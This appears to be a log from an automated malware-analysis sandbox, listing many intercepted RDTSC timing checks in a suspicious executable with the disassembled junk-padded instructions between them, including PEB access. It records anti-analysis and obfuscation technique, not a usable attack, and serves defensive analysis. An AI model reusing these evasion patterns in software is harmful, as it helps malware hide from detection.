Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9B3BE second address: D9B3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9B3C3 second address: D9B3C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9FB08 second address: D9FB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jng 00007FFBBCD95546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FFBBCD95551h 0x00000012 jnl 00007FFBBCD95546h 0x00000018 jg 00007FFBBCD95546h 0x0000001e jmp 00007FFBBCD9554Eh 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 jl 00007FFBBCD9554Eh 0x0000002d push edx 0x0000002e pop edx 0x0000002f ja 00007FFBBCD95546h 0x00000035 push esi 0x00000036 jnp 00007FFBBCD95546h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9FB5B second address: D9FB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: DA02B9 second address: DA02BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FD92 second address: E0FD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FD96 second address: E0FDB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFBBCD9554Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FDB4 second address: E0FDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FFBBCAD7296h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FDD3 second address: E0FDD9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: E0FDD9 second address: E0FDE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D20EC3 second address: D20EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D20EC9 second address: D20ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2DFBD second address: F2DFE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007FFBBCD9555Ch 0x0000000d jmp 00007FFBBCD95554h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2DFE0 second address: F2DFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007FFBBCAD7286h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2DFEE second address: F2DFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2DFF4 second address: F2DFF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2E45F second address: F2E476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBBCD95551h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F2E476 second address: F2E47A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F3126D second address: F31273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F31273 second address: F3127A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F315AF second address: F315C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F315C0 second address: F315C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F315C4 second address: F315DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F31880 second address: F31888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F31888 second address: F318E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FFBBCD95557h 0x00000010 push dword ptr [ebp+122D1AA1h] 0x00000016 and edx, 3020FFE3h 0x0000001c jbe 00007FFBBCD9554Ch 0x00000022 sub dword ptr [ebp+122D1C41h], edx 0x00000028 push F8ED617Bh 0x0000002d pushad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 pushad 0x00000035 jmp 00007FFBBCD95555h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F32B80 second address: F32BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7295h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFBBCAD7299h 0x0000000e jmp 00007FFBBCAD728Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: F34904 second address: F3490A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220019 second address: 7220036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220036 second address: 7220081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FFBBCD9554Dh 0x0000000b xor ch, 00000046h 0x0000000e jmp 00007FFBBCD95551h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FFBBCD9554Eh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FFBBCD9554Eh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220081 second address: 72200B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCAD7291h 0x00000008 pop esi 0x00000009 mov eax, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FFBBCAD7296h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72200B4 second address: 722010D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFBBCD95552h 0x00000013 jmp 00007FFBBCD95555h 0x00000018 popfd 0x00000019 jmp 00007FFBBCD95550h 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722010D second address: 7220111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220111 second address: 72201E0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFBBCD95556h 0x00000008 sbb ch, FFFFFFC8h 0x0000000b jmp 00007FFBBCD9554Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FFBBCD95558h 0x00000019 adc esi, 0331C728h 0x0000001f jmp 00007FFBBCD9554Bh 0x00000024 popfd 0x00000025 popad 0x00000026 sub esp, 18h 0x00000029 pushad 0x0000002a call 00007FFBBCD95554h 0x0000002f movzx ecx, di 0x00000032 pop edi 0x00000033 mov ecx, 36BC5AA3h 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a jmp 00007FFBBCD95556h 0x0000003f push eax 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FFBBCD95551h 0x00000047 and si, B756h 0x0000004c jmp 00007FFBBCD95551h 0x00000051 popfd 0x00000052 popad 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FFBBCD9554Fh 0x0000005d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72201E0 second address: 72201FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72201FD second address: 722020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD9554Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722020D second address: 7220211 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220211 second address: 7220239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBBCD95559h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220239 second address: 722023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722023D second address: 7220243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220243 second address: 7220249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220249 second address: 722024D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722024D second address: 72202A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ebx, eax 0x0000000c mov edi, eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007FFBBCAD7299h 0x00000015 xchg eax, esi 0x00000016 jmp 00007FFBBCAD728Eh 0x0000001b mov esi, dword ptr [74E806ECh] 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FFBBCAD7297h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72202A4 second address: 72202D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBBCD9554Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72202D2 second address: 72202D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72202D8 second address: 72202DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72202DC second address: 7220390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FFBBCAD822Ch 0x0000000e jmp 00007FFBBCAD728Fh 0x00000013 xchg eax, edi 0x00000014 pushad 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007FFBBCAD728Bh 0x0000001c and si, 56DEh 0x00000021 jmp 00007FFBBCAD7299h 0x00000026 popfd 0x00000027 pop ecx 0x00000028 mov edx, 54773254h 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FFBBCAD7298h 0x00000036 and ax, F608h 0x0000003b jmp 00007FFBBCAD728Bh 0x00000040 popfd 0x00000041 mov dl, ch 0x00000043 popad 0x00000044 xchg eax, edi 0x00000045 jmp 00007FFBBCAD728Bh 0x0000004a call dword ptr [74E50B60h] 0x00000050 mov eax, 750BE5E0h 0x00000055 ret 0x00000056 pushad 0x00000057 mov di, ax 0x0000005a mov edx, esi 0x0000005c popad 0x0000005d push 00000044h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FFBBCAD7294h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220390 second address: 722039F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD9554Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722039F second address: 7220453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFBBCAD728Fh 0x00000009 add eax, 5CF1C90Eh 0x0000000f jmp 00007FFBBCAD7299h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop edi 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FFBBCAD7294h 0x00000022 xor eax, 501EFAB8h 0x00000028 jmp 00007FFBBCAD728Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, edi 0x00000030 pushad 0x00000031 mov di, cx 0x00000034 pushfd 0x00000035 jmp 00007FFBBCAD7290h 0x0000003a sbb ax, 3518h 0x0000003f jmp 00007FFBBCAD728Bh 0x00000044 popfd 0x00000045 popad 0x00000046 push eax 0x00000047 jmp 00007FFBBCAD7299h 0x0000004c xchg eax, edi 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FFBBCAD728Dh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220453 second address: 72204AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCD95557h 0x00000008 pushfd 0x00000009 jmp 00007FFBBCD95558h 0x0000000e sbb ah, 00000038h 0x00000011 jmp 00007FFBBCD9554Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [eax] 0x0000001c pushad 0x0000001d mov al, FEh 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b mov eax, edx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72204AC second address: 72204E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FFBBCAD728Ch 0x00000008 pop ecx 0x00000009 call 00007FFBBCAD728Bh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push dword ptr [eax+18h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFBBCAD7291h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72204E3 second address: 72204F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220541 second address: 7220554 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206AF second address: 72206B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206B4 second address: 72206BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, C7h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206BB second address: 72206CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+10h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206CC second address: 72206D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206D1 second address: 72206D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206D7 second address: 72206DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72206DB second address: 722071C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b jmp 00007FFBBCD95552h 0x00000010 mov dword ptr [esi+14h], eax 0x00000013 jmp 00007FFBBCD95550h 0x00000018 mov eax, dword ptr [ebx+54h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FFBBCD9554Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722071C second address: 7220720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220720 second address: 7220726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220726 second address: 7220754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+18h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBBCAD7297h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220754 second address: 7220801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d jmp 00007FFBBCD9554Ch 0x00000012 call 00007FFBBCD95552h 0x00000017 pushfd 0x00000018 jmp 00007FFBBCD95552h 0x0000001d and cl, FFFFFFE8h 0x00000020 jmp 00007FFBBCD9554Bh 0x00000025 popfd 0x00000026 pop eax 0x00000027 popad 0x00000028 mov dword ptr [esi+1Ch], eax 0x0000002b jmp 00007FFBBCD9554Fh 0x00000030 mov eax, dword ptr [ebx+5Ch] 0x00000033 jmp 00007FFBBCD95556h 0x00000038 mov dword ptr [esi+20h], eax 0x0000003b pushad 0x0000003c mov cx, bx 0x0000003f popad 0x00000040 mov eax, dword ptr [ebx+60h] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FFBBCD95552h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220801 second address: 7220829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007FFBBCAD7292h 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220829 second address: 722082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 722082D second address: 7220884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, dx 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+64h] 0x0000000d jmp 00007FFBBCAD7293h 0x00000012 mov dword ptr [esi+28h], eax 0x00000015 pushad 0x00000016 mov al, 9Dh 0x00000018 pushfd 0x00000019 jmp 00007FFBBCAD7291h 0x0000001e xor ch, FFFFFF86h 0x00000021 jmp 00007FFBBCAD7291h 0x00000026 popfd 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+68h] 0x0000002b pushad 0x0000002c movzx esi, bx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220884 second address: 72208B6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFBBCD95552h 0x00000008 sub ax, BC58h 0x0000000d jmp 00007FFBBCD9554Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esi+2Ch], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72208B6 second address: 72208D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72208D1 second address: 72208D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72208D7 second address: 7220991 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f jmp 00007FFBBCAD7296h 0x00000014 mov word ptr [esi+30h], ax 0x00000018 jmp 00007FFBBCAD7290h 0x0000001d mov ax, word ptr [ebx+00000088h] 0x00000024 jmp 00007FFBBCAD7290h 0x00000029 mov word ptr [esi+32h], ax 0x0000002d jmp 00007FFBBCAD7290h 0x00000032 mov eax, dword ptr [ebx+0000008Ch] 0x00000038 pushad 0x00000039 mov bh, al 0x0000003b pushfd 0x0000003c jmp 00007FFBBCAD7293h 0x00000041 sbb esi, 1E40289Eh 0x00000047 jmp 00007FFBBCAD7299h 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [esi+34h], eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FFBBCAD728Dh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 7220991 second address: 72209D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c jmp 00007FFBBCD9554Eh 0x00000011 mov dword ptr [esi+38h], eax 0x00000014 jmp 00007FFBBCD95550h 0x00000019 mov eax, dword ptr [ebx+1Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: 72209D3 second address: 72209D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
